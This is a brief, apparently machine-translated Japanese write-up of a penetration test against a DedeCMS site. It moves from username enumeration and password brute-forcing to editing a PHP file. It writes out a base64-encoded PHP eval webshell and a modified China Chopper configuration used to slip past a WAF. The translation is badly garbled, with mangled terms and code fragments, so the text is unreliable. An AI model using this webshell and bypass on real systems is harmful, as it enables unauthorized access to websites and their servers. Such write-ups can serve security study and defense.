一度覚えておいてください織り夢CMS侵入テスト
0x01の序文
このテストのプロセス全体:ユーザー名の列挙は - 暴力的な休憩をターゲットに - バックグラウンドでの記号 - 背景編集のPHPファイルgetshell。
0x02のプロセス
1、ログインユーザ名の列挙機能モジュールの欠陥がある、ユーザー名を列挙するためにこの権限を使用します
図2に示すように、対応するパスワードのブルート力を列挙することにより、ユーザ名、認証コードなしで機能モジュールログ。背景(dedecmsのV57)ログイン
図3は、ピットに遭遇し始めました。ファイル管理アップロードファイルや新しい広告手法は、(一見WAF)getshellすることはできません。アクションは、接続がリセットされています。
4、直接、元のファイルを編集しようとすると、コードが書かれています。
(1)書き込みは、phpinfo();成功しました
実行されたとき(2)従来の書き込みワードが正常しかし、接続がリセットされ
(3)ワードbase64エンコーディング書き込み<PHPの@Eval(BASE64_DECODE($ _ POST [ '0nth3wayを']));?>、符号化されたデータが正常に後に行うことができます
5、ナイフは、以下の設定ファイルcaidao.confを変更するには、単語トロイの木馬を接続することができます。
<PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs %% 3D&ID =%S </ PHP_BASE>
6、成功した単語に接続チョッパー。権限:IISユーザー
プロセスを参照してくださいwkds.exe名付け7は、気持ちが一番下に取得していない、保護ソフトウェアです。
8、次の日の寒さ。
(1)MA依然として、ナイフROMなどを用いることができます。()のphpinfoを実行することができます。(「whoamiは」)、システムを実行することができない、のphpinfo相関関数が無効になってああではないも参照してください。疑問符の顔???探している答え0.0
(2)背景には、ファイルを編集することができません
0x03のあとがき
このテストでは、心の中でこれを取得することです:
(1)トラフィックデータバイパスWAF、チョッパ構成変更コネクションをコードすることができます。
(2)カルペディエム